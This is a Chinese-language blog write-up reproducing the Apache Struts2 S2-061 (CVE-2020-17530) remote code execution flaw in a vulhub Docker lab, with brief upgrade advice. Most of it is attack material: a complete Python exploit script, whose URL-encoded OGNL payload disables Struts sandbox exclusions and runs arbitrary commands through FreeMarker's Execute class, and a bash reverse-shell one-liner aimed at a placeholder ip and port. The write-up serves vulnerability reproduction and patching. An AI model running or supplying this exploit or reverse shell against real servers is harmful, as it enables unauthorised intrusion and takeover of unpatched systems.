漏洞介绍
Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞,开发人员使用了 %{…} 语法,从而攻击者可以通过构Payload,从而造成远程代码执行。
影响版本
Apache Struts2:2.0.0 - 2.5.25
漏洞复现
1 2 3
https://github.com/vulhub/vulhub/tree/master/struts2/s2-061 docker-compose up -d
1 2 3
╰─$ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES e60ea5e361ff vulhub/struts2:2.5.25 "/usr/local/bin/mvn-…" 34 minutes ago Up 34 minutes 0.0.0.0:8080->8080/tcp s2-061_struts2_1
通过在线地址将bash反弹命令进行进行编码转换
http://www.jackson-t.ca/runtime-exec-payloads.html
bash -i >& /dev/tcp/ip/port 0>&1
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
import requestsimport sysfrom lxml import etreedef exp (url,cmd ): payload="%25%7b(%27ol4three%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application%5b%27org.apache.tomcat.InstanceManager%27%5d).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr%5b%27struts.valueStack%27%5d).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d%7b%27" +cmd+"%27%7d).(%23res%3d%23exec.exec(%23cmd))%7d" tturl=url+"/?id=" +payload r=requests.get(tturl) page=r.text page=etree.HTML(page) data = page.xpath('//a[@id]/@id' ) print(data[0 ]) if __name__=='__main__' : print('+------------------------------------------------------------+' ) print('+ EXP: python struts2-061-poc.py http://1.1.1.1:8081 id +' ) print('+ VER: Struts 2.0.0-2.5.25 +' ) print('+------------------------------------------------------------+' ) print('+ S2-061 RCE && CVE-2020-17530 +' ) print('+------------------------------------------------------------+' ) if len(sys.argv)!=3 : print("[+]ussage: http://ip:port command" ) print("[+]============================================================" ) sys.exit() url=sys.argv[1 ] cmd=sys.argv[2 ] exp(url,cmd)
修复意见
将Apache Struts框架升级至最新版本
https://cwiki.apache.org/confluence/display/WW/S2-061
参考链接
https://mp.weixin.qq.com/s/rcfXIBSpNtgCFua0yUK_ew
FROM :ol4three.com | Author:ol4three
评论